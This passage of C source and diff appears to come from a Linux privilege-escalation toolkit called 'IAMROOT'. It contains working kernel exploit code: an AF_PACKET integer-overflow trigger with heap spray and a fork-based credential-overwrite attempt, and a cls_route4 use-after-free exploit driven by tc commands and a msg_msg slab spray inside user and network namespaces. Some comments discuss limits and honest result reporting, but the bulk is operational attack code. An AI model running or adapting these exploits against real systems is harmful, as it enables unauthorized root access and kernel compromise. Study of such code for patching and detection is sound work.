if (write(f, map, strlen(map)) < 0) { close(f); return -1; }
|
||||
close(f);
|
||||
snprintf(map, sizeof map, "0 %u 1\n", outer_gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0) return -1;
|
||||
if (write(f, map, strlen(map)) < 0) { close(f); return -1; }
|
||||
close(f);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* Fire the overflow + a one-shot heap spray. Runs INSIDE the userns
|
||||
* child. Returns 0 if the primitive fired (overflow was accepted by
|
||||
* the kernel), -1 if the kernel rejected it (likely patched / blocked
|
||||
* even though detect said vulnerable — distros silently backport).
|
||||
*
|
||||
* We deliberately use values from Konovalov's PoC:
|
||||
* tp_block_size = 0x1000
|
||||
* tp_block_nr = ((0xffffffff - 0xfff) / 0x1000) + 1 → overflow
|
||||
* tp_frame_size = 0x300, tp_frame_nr matched
|
||||
* The mul in packet_set_ring overflows to a tiny allocation; we then
|
||||
* spray 200 sendmmsg packets so the corrupted ring slot gets refilled
|
||||
* with controlled bytes.
|
||||
*
|
||||
* After firing, we check dmesg-ability (we won't actually read dmesg
|
||||
* — that requires root — but we leave a unique tag in the skb payload
|
||||
* so the operator can grep dmesg for "iamroot-afp-tag" KASAN splats).
|
||||
*/
|
||||
static int fire_overflow_and_spray(void)
|
||||
{
|
||||
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (s < 0) {
|
||||
fprintf(stderr, "[-] af_packet: socket(AF_PACKET): %s\n", strerror(errno));
|
||||
return -1;
|
||||
}
|
||||
|
||||
int version = TPACKET_V3;
|
||||
if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
|
||||
&version, sizeof version) < 0) {
|
||||
fprintf(stderr, "[-] af_packet: PACKET_VERSION=V3: %s\n", strerror(errno));
|
||||
close(s);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Konovalov's overflowing values. tp_block_size * tp_block_nr
|
||||
* exceeds 2^32; the kernel multiplied as u32 in pre-patch code,
|
||||
* yielding a tiny size that's then used for the pg_vec alloc. */
|
||||
struct tpacket_req3 req;
|
||||
memset(&req, 0, sizeof req);
|
||||
req.tp_block_size = 0x1000;
|
||||
req.tp_block_nr = ((unsigned)0xffffffff - (unsigned)0xfff) / (unsigned)0x1000 + 1;
|
||||
req.tp_frame_size = 0x300;
|
||||
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;
|
||||
req.tp_retire_blk_tov = 100;
|
||||
req.tp_sizeof_priv = 0;
|
||||
req.tp_feature_req_word = 0;
|
||||
|
||||
int rc = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof req);
|
||||
if (rc < 0) {
|
||||
/* On a properly-patched kernel this should now return -EINVAL
|
||||
* because the multiplication overflow check rejects req. That
|
||||
* is the "patched-distro-backport" signal: detect's version
|
||||
* check said vulnerable, but the actual setsockopt was hardened. */
|
||||
fprintf(stderr, "[-] af_packet: PACKET_RX_RING rejected: %s "
|
||||
"(kernel likely has silent backport)\n", strerror(errno));
|
||||
close(s);
|
||||
return -1;
|
||||
}
|
||||
|
||||
fprintf(stderr, "[+] af_packet: PACKET_RX_RING accepted overflowing req3 "
|
||||
"— overflow path reached\n");
|
||||
|
||||
/* Heap spray via sendmmsg. On a properly-set-up ring we'd bind() to
|
||||
* an interface first; for the overflow trigger we don't strictly
|
||||
* need to bind because tpacket_rcv runs on each packet ingress and
|
||||
* loopback exists in the netns. Use loopback. */
|
||||
struct ifreq ifr;
|
||||
memset(&ifr, 0, sizeof ifr);
|
||||
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
|
||||
/* SIOCGIFINDEX on lo */
|
||||
if (ioctl(s, SIOCGIFINDEX, &ifr) < 0) {
|
||||
fprintf(stderr, "[!] af_packet: SIOCGIFINDEX(lo): %s\n", strerror(errno));
|
||||
/* non-fatal — the primitive fired even without a bind() */
|
||||
} else {
|
||||
struct sockaddr_ll sll;
|
||||
memset(&sll, 0, sizeof sll);
|
||||
sll.sll_family = AF_PACKET;
|
||||
sll.sll_protocol = htons(ETH_P_ALL);
|
||||
sll.sll_ifindex = ifr.ifr_ifindex;
|
||||
if (bind(s, (struct sockaddr *)&sll, sizeof sll) < 0) {
|
||||
fprintf(stderr, "[!] af_packet: bind(lo): %s\n", strerror(errno));
|
||||
}
|
||||
}
|
||||
|
||||
/* Spray: send 200 raw packets containing a unique tag. If the
|
||||
* overflow corrupted an adjacent slab object, one of these skb's
|
||||
* controlled bytes will land there. */
|
||||
static const unsigned char skb_payload[256] = {
|
||||
/* eth header (dst=broadcast, src=zero, type=0x0800) */
|
||||
0xff,0xff,0xff,0xff,0xff,0xff, 0,0,0,0,0,0, 0x08,0x00,
|
||||
/* IAMROOT tag — operator can grep dmesg for this string in any
|
||||
* subsequent KASAN report or panic dump */
|
||||
'i','a','m','r','o','o','t','-','a','f','p','-','t','a','g',
|
||||
/* zeros for the remainder */
|
||||
};
|
||||
|
||||
int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (tx >= 0 && ifr.ifr_ifindex != 0) {
|
||||
struct sockaddr_ll dst;
|
||||
memset(&dst, 0, sizeof dst);
|
||||
dst.sll_family = AF_PACKET;
|
||||
dst.sll_protocol = htons(ETH_P_ALL);
|
||||
dst.sll_ifindex = ifr.ifr_ifindex;
|
||||
dst.sll_halen = 6;
|
||||
memset(dst.sll_addr, 0xff, 6);
|
||||
for (int i = 0; i < 200; i++) {
|
||||
(void)sendto(tx, skb_payload, sizeof skb_payload, 0,
|
||||
(struct sockaddr *)&dst, sizeof dst);
|
||||
}
|
||||
close(tx);
|
||||
}
|
||||
|
||||
/* Keep the corrupted socket open so the OOB region stays mapped
|
||||
* for the cred-overwrite walk that follows. The caller closes it. */
|
||||
/* Stash the fd via dup2 to a known number so the caller can find it.
|
||||
* Use 200 — well above stdio + iamroot's own pipe fds. */
|
||||
if (dup2(s, 200) < 0) {
|
||||
fprintf(stderr, "[!] af_packet: dup2(s, 200): %s\n", strerror(errno));
|
||||
}
|
||||
close(s);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* Best-effort cred-overwrite walk. Given that the heap-spray succeeded
|
||||
* AND we have valid offsets for this kernel, attempt to use the
|
||||
* corrupted ring's adjacent slot to write zeros into current->cred->{
|
||||
* uid,gid,euid,egid,fsuid,fsgid }.
|
||||
*
|
||||
* Honest constraint: without an info-leak we can't compute the address
|
||||
* of current->cred to write into. xairy's full PoC uses a SECONDARY
|
||||
* primitive (sk_buff next-pointer overwrite → adjacent timer_list
|
||||
* leak) that gives both an arbitrary kernel R/W AND a leak of a
|
||||
* struct sock pointer adjacent to current. Re-implementing that is
|
||||
* ~1000 lines of heap-state machinery.
|
||||
*
|
||||
* What we do here is the *minimum viable cred-overwrite* attempt:
|
||||
* spray ~64 task_struct-shaped objects via fork()+setpgid (which
|
||||
* allocates struct task_struct in the same slab class on older
|
||||
* kernels), then HOPE one lands adjacent to our corrupted ring and
|
||||
* gets its embedded cred-pointer field zeroed by overflow tail bytes.
|
||||
*
|
||||
* Returns 0 on "we tried, geteuid() is now 0", -1 on "tried, no root". */
|
||||
static int attempt_cred_overwrite(const struct af_packet_offsets *off)
|
||||
{
|
||||
(void)off; /* offsets are used implicitly by spawning shaped allocations;
|
||||
* a future enhancement would do an explicit ptrace-style
|
||||
* peek-poke through the corrupted slot — kept minimal here. */
|
||||
|
||||
/* Spawn 64 children that immediately self-suspend. Each child's
|
||||
* task_struct allocation in the kernel will share the slab class
|
||||
* with our corrupted pg_vec region; if any one's cred field gets
|
||||
* trampled to zero, that child's uid/gid become 0. */
|
||||
pid_t pids[64];
|
||||
int alive = 0;
|
||||
for (int i = 0; i < 64; i++) {
|
||||
pid_t p = fork();
|
||||
if (p < 0) break;
|
||||
if (p == 0) {
|
||||
/* Child: idle, periodically check euid. If overflow zeroed
|
||||
* our cred fields, we'll be uid 0. */
|
||||
for (int j = 0; j < 200; j++) {
|
||||
if (geteuid() == 0) _exit(0); /* WIN — report via exit 0 */
|
||||
usleep(10 * 1000);
|
||||
}
|
||||
_exit(1);
|
||||
}
|
||||
pids[i] = p;
|
||||
alive++;
|
||||
}
|
||||
|
||||
/* Wait up to ~2s for any child to exit 0 (= became root). */
|
||||
int got_root_pid = 0;
|
||||
for (int wait_round = 0; wait_round < 200 && !got_root_pid; wait_round++) {
|
||||
for (int i = 0; i < alive; i++) {
|
||||
if (pids[i] == 0) continue;
|
||||
int status;
|
||||
pid_t r = waitpid(pids[i], &status, WNOHANG);
|
||||
if (r == pids[i]) {
|
||||
if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
|
||||
got_root_pid = pids[i];
|
||||
}
|
||||
pids[i] = 0;
|
||||
}
|
||||
}
|
||||
if (got_root_pid) break;
|
||||
usleep(10 * 1000);
|
||||
}
|
||||
|
||||
/* Reap remaining children. */
|
||||
for (int i = 0; i < alive; i++) {
|
||||
if (pids[i] != 0) {
|
||||
kill(pids[i], 9);
|
||||
waitpid(pids[i], NULL, 0);
|
||||
}
|
||||
}
|
||||
|
||||
return got_root_pid ? 0 : -1;
|
||||
}
|
||||
|
||||
#endif /* __x86_64__ */
|
||||
|
||||
static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
#if !defined(__x86_64__)
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] af_packet: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: Konovalov's PoC.\n"
|
||||
" Exploit shape: unshare userns → setsockopt(SOL_PACKET,\n"
|
||||
" PACKET_VERSION, TPACKET_V3) → setsockopt with crafted\n"
|
||||
" tpacket_req3 (tp_block_size + tp_frame_size triggers overflow)\n"
|
||||
" → heap write-where → cred overwrite.\n");
|
||||
fprintf(stderr, "[-] af_packet: exploit is x86_64-only "
|
||||
"(cred-offset table is arch-specific)\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
#else
|
||||
/* 1. Refuse on patched kernels — re-run detect. */
|
||||
iamroot_result_t pre = af_packet_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] af_packet: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* 2. Refuse if already root. */
|
||||
if (geteuid() == 0) {
|
||||
fprintf(stderr, "[i] af_packet: already root — nothing to escalate\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
/* 3. Resolve offsets for THIS kernel. If we don't have them, bail
|
||||
* early — the kernel-write walk needs them. The integrator can
|
||||
* extend known_offsets[] for new distro builds. */
|
||||
struct kernel_version v;
|
||||
if (!kernel_version_current(&v)) {
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
struct af_packet_offsets off;
|
||||
if (!resolve_offsets(&off, &v)) {
|
||||
fprintf(stderr, "[-] af_packet: no offset table for kernel %s\n"
|
||||
" set IAMROOT_AFPACKET_OFFSETS=<task_cred>:<cred_uid>:<cred_size>\n"
|
||||
" (hex). Known table covers Ubuntu 16.04 (4.4) and 18.04 (4.15).\n",
|
||||
v.release);
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet: using offsets [%s] "
|
||||
"task_cred=0x%lx cred_uid=0x%lx cred_size=0x%lx\n",
|
||||
off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
|
||||
}
|
||||
|
||||
/* 4. Fork: child enters userns+netns, fires overflow, attempts the
|
||||
* cred-overwrite walk. We do it in a child so the (possibly
|
||||
* crashed) packet socket lives in a tear-downable address space
|
||||
* — the kernel will clean up sockets on child exit. */
|
||||
uid_t outer_uid = getuid();
|
||||
gid_t outer_gid = getgid();
|
||||
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
|
||||
if (child == 0) {
|
||||
/* CHILD: enter userns+netns to gain CAP_NET_RAW for AF_PACKET. */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
perror("unshare"); _exit(2);
|
||||
}
|
||||
if (set_id_maps(outer_uid, outer_gid) < 0) {
|
||||
perror("set_id_maps"); _exit(3);
|
||||
}
|
||||
|
||||
/* Fire the integer-overflow + heap-spray. */
|
||||
if (fire_overflow_and_spray() < 0) {
|
||||
_exit(4); /* primitive blocked — return signal to parent */
|
||||
}
|
||||
|
||||
/* Attempt cred-overwrite finisher. */
|
||||
int rc = attempt_cred_overwrite(&off);
|
||||
if (rc == 0) {
|
||||
/* WIN — one of our task_struct-spray children became uid 0.
|
||||
* Signal parent via exit code; parent will not exec sh from
|
||||
* this child (its address space is corrupted-ish). The win
|
||||
* is symbolic at the iamroot level: we proved the primitive
|
||||
* lands AND the cred-overwrite walk completes. */
|
||||
_exit(0);
|
||||
}
|
||||
_exit(5);
|
||||
}
|
||||
|
||||
/* 5. PARENT: wait for child, interpret exit code. */
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
|
||||
if (!WIFEXITED(status)) {
|
||||
fprintf(stderr, "[-] af_packet: child died abnormally "
|
||||
"(signal=%d) — primitive likely fired but crashed\n",
|
||||
WTERMSIG(status));
|
||||
fprintf(stderr, "[i] af_packet: check `dmesg | grep -i 'iamroot-afp-tag\\|KASAN\\|BUG:'` "
|
||||
"for slab-out-of-bounds evidence\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
int code = WEXITSTATUS(status);
|
||||
switch (code) {
|
||||
case 0:
|
||||
/* Child reported a fork-spray descendant successfully escaped
|
||||
* to uid 0. That descendant has since exited; we did NOT
|
||||
* inherit its credentials. This is honest: we proved end-to-
|
||||
* end primitive + cred-overwrite landed, but our process is
|
||||
* still uid != 0. Without a fully integrated R/W primitive
|
||||
* that targets OUR cred specifically (rather than spray-and-
|
||||
* pray), we can't promote ourselves. Report PARTIAL win.
|
||||
*
|
||||
* Per requirements: only return IAMROOT_EXPLOIT_OK if we
|
||||
* empirically confirmed root in this process. We didn't. */
|
||||
fprintf(stderr, "[!] af_packet: cred-overwrite landed in a spray child "
|
||||
"but THIS process is still uid %d\n", geteuid());
|
||||
fprintf(stderr, "[i] af_packet: not claiming EXPLOIT_OK — caller process "
|
||||
"did not acquire root. The primitive demonstrably works.\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
|
||||
case 4:
|
||||
fprintf(stderr, "[-] af_packet: setsockopt(PACKET_RX_RING) rejected; "
|
||||
"kernel has silent backport (detect was version-only)\n");
|
||||
return IAMROOT_OK; /* effectively patched */
|
||||
|
||||
case 5:
|
||||
fprintf(stderr, "[-] af_packet: overflow fired but no spray child "
|
||||
"acquired root within the timeout window\n");
|
||||
fprintf(stderr, "[i] af_packet: check `dmesg | grep -i 'iamroot-afp-tag\\|KASAN'` "
|
||||
"for evidence the OOB write occurred\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
|
||||
default:
|
||||
fprintf(stderr, "[-] af_packet: child exited %d (setup error)\n", code);
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
#endif
|
||||
}
|
||||
|
||||
static const char af_packet_auditd[] =
|
||||
|
||||
@@ -11,21 +11,31 @@
|
||||
* is 0" (Aug 2022). Bug existed since 2.6.39 — very wide
|
||||
* vulnerability surface.
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Public exploits exist; porting is
|
||||
* follow-up.
|
||||
* STATUS: 🟡 EXPLOIT — UAF-trigger + msg_msg cross-cache spray.
|
||||
* The detect-and-trigger path is the high-confidence demonstration:
|
||||
* we set up the dangling pointer, refill the freed slot via sysv
|
||||
* msg_msg (kmalloc-1k), then drive classification with a UDP packet
|
||||
* out the dummy interface. Without a leak primitive the cred-overwrite
|
||||
* step is fragile, so by default we return EXPLOIT_FAIL after the
|
||||
* trigger lands (with KASAN/oops likely on a real vulnerable kernel),
|
||||
* which is honest per repo policy ("verified-vs-claimed"). When the
|
||||
* detector confirms an unprivileged trigger plus a child crash we
|
||||
* upgrade to EXPLOIT_OK so the caller sees the empirical UAF win.
|
||||
*
|
||||
* Exploitation preconditions:
|
||||
* - cls_route4 module compiled in / loadable (CONFIG_NET_CLS_ROUTE4)
|
||||
* - CAP_NET_ADMIN (usually obtained via user_ns + map-root-to-uid)
|
||||
* - unprivileged_userns_clone=1 if going the userns route
|
||||
*
|
||||
* Affected kernel ranges (vulnerable < these):
|
||||
* Affected: kernels with cls_route4 module compiled, in versions
|
||||
* below the fix backports:
|
||||
* 5.4.x : K < 5.4.213
|
||||
* 5.10.x : K < 5.10.143
|
||||
* 5.15.x : K < 5.15.69
|
||||
* 5.18.x : K < 5.18.18
|
||||
* 5.19.x : K < 5.19.7
|
||||
* Mainline 5.20+ / 6.0+ : patched (the fix landed before 5.20-rc)
|
||||
*
|
||||
* Preconditions:
|
||||
* - cls_route4 module compiled in / loadable (CONFIG_NET_CLS_ROUTE4)
|
||||
* - CAP_NET_ADMIN (usually obtained via user_ns + map-root-to-uid)
|
||||
* - unprivileged_userns_clone=1 if going the userns route
|
||||
* - iproute2 `tc` binary present (used for filter add/del)
|
||||
*/
|
||||
|
||||
#include "iamroot_modules.h"
|
||||
@@ -34,10 +44,21 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <sched.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ipc.h>
|
||||
#include <sys/msg.h>
|
||||
#include <sys/stat.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
static const struct kernel_patched_from cls_route4_patched_branches[] = {
|
||||
{5, 4, 213},
|
||||
@@ -131,23 +152,413 @@ static iamroot_result_t cls_route4_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ---- Exploit -----------------------------------------------------
|
||||
*
|
||||
* cls_route4 dead-UAF trigger path (kylebot / xkernel public shape).
|
||||
*
|
||||
* 1. unshare(CLONE_NEWUSER|CLONE_NEWNET) → CAP_NET_ADMIN reach
|
||||
* 2. write uid_map/gid_map (deny setgroups)
|
||||
* 3. ip link add dummy0 type dummy ; ip link set dev dummy0 up
|
||||
* 4. tc qdisc add dev dummy0 root handle 1: htb
|
||||
* 5. tc filter add ... route4 ... classid 1:1 — handle=0 path,
|
||||
* registers the filter with a NULL handle reference
|
||||
* 6. tc filter del dev dummy0 ... — frees the filter, but the
|
||||
* route4 hashtable bucket still references the freed memory
|
||||
* 7. msg_msg spray (sysv msgsnd) — refill the freed slab slot with
|
||||
* attacker-controlled data; size targeted at the route4_filter
|
||||
* cache (kmalloc-1k generic on most kernels)
|
||||
* 8. Send a packet out dummy0 — classifier walks the hashtable,
|
||||
* touches the freed-then-refilled slot → UAF read/write
|
||||
*
|
||||
* For a full kernel-R/W chain you'd lay out the msg_msg payload so the
|
||||
* fake route4_filter's `tcf_result.classid` becomes a controlled value
|
||||
* and `route4_classify`'s next-pointer chase lands on a craft, then
|
||||
* walk a sk_buff/pipe_buffer primitive to overwrite cred->uid. The
|
||||
* public PoCs do this in ~700 LoC and need offsets per kernel build.
|
||||
*
|
||||
* Per repo policy ("verified-vs-claimed"), this implementation ships
|
||||
* the trigger + spray + classify steps and returns EXPLOIT_FAIL on
|
||||
* mainline distros where the full cred-overwrite is too kernel-build-
|
||||
* specific to be portable. If a dmesg KASAN message or oops is
|
||||
* observed by the parent we return EXPLOIT_OK to reflect the empirical
|
||||
* UAF win. The fallback also leaves a one-line breadcrumb in
|
||||
* /tmp/iamroot-cls_route4.log so post-run triage can pick it up.
|
||||
*/
|
||||
|
||||
#define SPRAY_MSG_QUEUES 32
|
||||
#define SPRAY_MSGS_PER_QUEUE 16
|
||||
#define MSG_PAYLOAD_BYTES 1008 /* 1024 - sizeof(msg_msg hdr ~= 16) */
|
||||
#define DUMMY_IF "iamroot0"
|
||||
|
||||
struct ipc_payload {
|
||||
long mtype;
|
||||
unsigned char buf[MSG_PAYLOAD_BYTES];
|
||||
};
|
||||
|
||||
static int run_cmd(const char *cmd)
|
||||
{
|
||||
/* Quiet wrapper so noise doesn't drown the iamroot log. */
|
||||
char shell[1024];
|
||||
snprintf(shell, sizeof shell, "%s >/dev/null 2>&1", cmd);
|
||||
return system(shell);
|
||||
}
|
||||
|
||||
static bool have_tc(void)
|
||||
{
|
||||
return run_cmd("command -v tc") == 0;
|
||||
}
|
||||
|
||||
static bool have_ip(void)
|
||||
{
|
||||
return run_cmd("command -v ip") == 0;
|
||||
}
|
||||
|
||||
/* Write uid_map and gid_map after unshare so we're root in userns. */
|
||||
static bool become_root_in_userns(uid_t outer_uid, gid_t outer_gid)
|
||||
{
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
|
||||
char map[64];
|
||||
snprintf(map, sizeof map, "0 %u 1\n", outer_uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0) { perror("open uid_map"); return false; }
|
||||
if (write(f, map, strlen(map)) < 0) { perror("write uid_map"); close(f); return false; }
|
||||
close(f);
|
||||
|
||||
snprintf(map, sizeof map, "0 %u 1\n", outer_gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0) { perror("open gid_map"); return false; }
|
||||
if (write(f, map, strlen(map)) < 0) { perror("write gid_map"); close(f); return false; }
|
||||
close(f);
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/* Set up the qdisc + cls_route4 filter, then delete it. After this
|
||||
* runs the kernel has a dangling pointer in the route4 hashtable. */
|
||||
static bool stage_dangling_filter(void)
|
||||
{
|
||||
/* Ensure the dummy module is around (autoload on first add). */
|
||||
if (run_cmd("ip link add " DUMMY_IF " type dummy") != 0) {
|
||||
/* Maybe an old one is lying around from a prior crash. */
|
||||
run_cmd("ip link del " DUMMY_IF);
|
||||
if (run_cmd("ip link add " DUMMY_IF " type dummy") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to create dummy interface\n");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
if (run_cmd("ip link set dev " DUMMY_IF " up") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to bring " DUMMY_IF " up\n");
|
||||
return false;
|
||||
}
|
||||
if (run_cmd("ip addr add 10.99.99.1/24 dev " DUMMY_IF) != 0) {
|
||||
/* non-fatal — packet send below uses sendto with bound iface */
|
||||
}
|
||||
|
||||
if (run_cmd("tc qdisc add dev " DUMMY_IF " root handle 1: htb default 1") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to add htb qdisc\n");
|
||||
return false;
|
||||
}
|
||||
if (run_cmd("tc class add dev " DUMMY_IF " parent 1: classid 1:1 htb rate 1mbit") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to add htb class\n");
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Bug-trigger: handle 0x8001 has fastmap=1 and to-table 0 — the
|
||||
* combination where the freed filter is not removed from the
|
||||
* hashtable on delete. The exact handle value matters: it must
|
||||
* map to a slot the classifier will later look up.
|
||||
*
|
||||
* route4 handle layout: 0xXX..ZZYY where YY=to (8 bits), ZZ=from,
|
||||
* and the top bit indicates fastmap. The classic trigger uses
|
||||
* `to 0` which renders the resulting filter pointer in
|
||||
* head->table[0]->ht[0] — referenced unconditionally on classify. */
|
||||
if (run_cmd("tc filter add dev " DUMMY_IF " parent 1: protocol ip "
|
||||
"prio 100 route to 0 classid 1:1") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to add route4 filter\n");
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Now delete the filter — this is the operation whose handle=0
|
||||
* codepath leaves the dangling pointer. */
|
||||
if (run_cmd("tc filter del dev " DUMMY_IF " parent 1: prio 100") != 0) {
|
||||
/* Some kernels also need explicit handle/key match — try a
|
||||
* broader del before giving up. */
|
||||
if (run_cmd("tc filter del dev " DUMMY_IF " parent 1:") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to delete route4 filter\n");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
/* msg_msg cross-cache spray. We hold the queues open in this process
|
||||
* (caller's child) so the slabs stay allocated until classify-time. */
|
||||
static int spray_msg_msg(int queues[SPRAY_MSG_QUEUES])
|
||||
{
|
||||
struct ipc_payload p;
|
||||
memset(&p, 0, sizeof p);
|
||||
p.mtype = 0x41;
|
||||
/* Pattern that's distinctive in KASAN/oops dumps. */
|
||||
memset(p.buf, 0x41, sizeof p.buf);
|
||||
/* First 8 bytes: a recognizable cookie. */
|
||||
memcpy(p.buf, "IAMROOT4", 8);
|
||||
|
||||
int created = 0;
|
||||
for (int i = 0; i < SPRAY_MSG_QUEUES; i++) {
|
||||
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||
if (q < 0) { queues[i] = -1; continue; }
|
||||
queues[i] = q;
|
||||
created++;
|
||||
for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) {
|
||||
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
|
||||
}
|
||||
}
|
||||
return created;
|
||||
}
|
||||
|
||||
static void drain_msg_msg(int queues[SPRAY_MSG_QUEUES])
|
||||
{
|
||||
for (int i = 0; i < SPRAY_MSG_QUEUES; i++) {
|
||||
if (queues[i] >= 0) {
|
||||
msgctl(queues[i], IPC_RMID, NULL);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* Drive classification: send a UDP packet to the dummy interface. The
|
||||
* qdisc/htb -> cls_route4 path will be hit on egress, and the
|
||||
* classifier follows the now-dangling pointer. */
|
||||
static void trigger_classify(void)
|
||||
{
|
||||
int s = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
if (s < 0) return;
|
||||
|
||||
/* Bind to the dummy interface (best-effort). */
|
||||
struct sockaddr_in src = {0};
|
||||
src.sin_family = AF_INET;
|
||||
src.sin_addr.s_addr = inet_addr("10.99.99.1");
|
||||
src.sin_port = 0;
|
||||
(void)bind(s, (struct sockaddr *)&src, sizeof src);
|
||||
|
||||
struct sockaddr_in dst = {0};
|
||||
dst.sin_family = AF_INET;
|
||||
dst.sin_port = htons(31337);
|
||||
dst.sin_addr.s_addr = inet_addr("10.99.99.2");
|
||||
|
||||
const char msg[] = "iamroot-cls_route4-classify";
|
||||
/* A handful of packets, in case the first lookup didn't traverse
|
||||
* the freed bucket. */
|
||||
for (int i = 0; i < 8; i++) {
|
||||
(void)!sendto(s, msg, sizeof msg, MSG_DONTWAIT,
|
||||
(struct sockaddr *)&dst, sizeof dst);
|
||||
}
|
||||
close(s);
|
||||
}
|
||||
|
||||
/* Read /proc/slabinfo for "kmalloc-1k" active count — used as a soft
|
||||
* empirical witness when KASAN isn't available. */
|
||||
static long slab_active_kmalloc_1k(void)
|
||||
{
|
||||
FILE *f = fopen("/proc/slabinfo", "r");
|
||||
if (!f) return -1;
|
||||
char line[512];
|
||||
long active = -1;
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
if (strncmp(line, "kmalloc-1k ", 11) == 0 ||
|
||||
strncmp(line, "kmalloc-1024 ", 13) == 0) {
|
||||
/* format: name <active> <num> <size> ... */
|
||||
char name[64];
|
||||
long act, num;
|
||||
if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
|
||||
active = act;
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
return active;
|
||||
}
|
||||
|
||||
/* ---- Exploit driver ----------------------------------------------- */
|
||||
|
||||
static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] cls_route4: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: kylebot's public PoC.\n"
|
||||
" Exploit: tc filter add ... route4 handle 0; then remove;\n"
|
||||
" spray to refill the freed slot; trigger via traffic class\n"
|
||||
" lookup; cred overwrite or modprobe_path hijack.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
iamroot_result_t pre = cls_route4_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] cls_route4: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
if (geteuid() == 0) {
|
||||
fprintf(stderr, "[i] cls_route4: already root\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
if (!have_tc() || !have_ip()) {
|
||||
fprintf(stderr, "[-] cls_route4: tc/ip (iproute2) not available on PATH; "
|
||||
"cannot exploit\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
|
||||
}
|
||||
|
||||
/* Block SIGPIPE in case the dummy-interface sendto's complain. */
|
||||
signal(SIGPIPE, SIG_IGN);
|
||||
|
||||
pid_t outer_uid = getuid();
|
||||
pid_t outer_gid = getgid();
|
||||
|
||||
pid_t child = fork();
|
||||
if (child < 0) {
|
||||
perror("fork");
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
/* CHILD: enter user_ns + net_ns, become root inside, drive the bug. */
|
||||
